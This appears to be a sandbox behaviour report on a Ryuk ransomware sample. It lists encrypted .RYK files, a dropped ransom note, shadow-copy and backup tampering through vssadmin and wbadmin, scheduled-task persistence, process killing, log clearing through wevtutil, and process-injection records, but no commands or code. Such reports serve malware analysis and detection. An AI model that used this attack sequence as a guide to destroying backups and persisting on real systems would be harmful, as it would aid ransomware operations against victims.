File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluCCFilesEmpty_180x180.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\illustrations_retina.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\dt.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\OMICAUTINTL.DLL.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl C:\Windows\system32\wbadmin.exe N/A
File created C:\Windows\RyukReadMe.txt C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File created C:\Windows\hrmlog1 C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1244 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1572 wrote to memory of 1272 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1572 wrote to memory of 1272 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1244 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 4420 wrote to memory of 4876 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4420 wrote to memory of 4876 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1244 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 968 wrote to memory of 3668 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 968 wrote to memory of 3668 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1244 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 2236 wrote to memory of 4500 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2236 wrote to memory of 4500 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1244 wrote to memory of 4100 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 4100 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 4100 wrote to memory of 3412 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4100 wrote to memory of 3412 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1244 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 3928 wrote to memory of 4460 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3928 wrote to memory of 4460 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1244 wrote to memory of 320 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 320 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 320 wrote to memory of 220 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 320 wrote to memory of 220 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1244 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 4804 wrote to memory of 4688 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4804 wrote to memory of 4688 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 836 wrote to memory of 960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 836 wrote to memory of 960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 836 wrote to memory of 4900 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 836 wrote to memory of 4900 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2788 wrote to memory of 3192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2788 wrote to memory of 3192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4688 wrote to memory of 3964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 4688 wrote to memory of 3964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1244 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 740 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 740 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 960 wrote to memory of 4844 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 960 wrote to memory of 4844 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1244 wrote to memory of 4552 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 4552 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
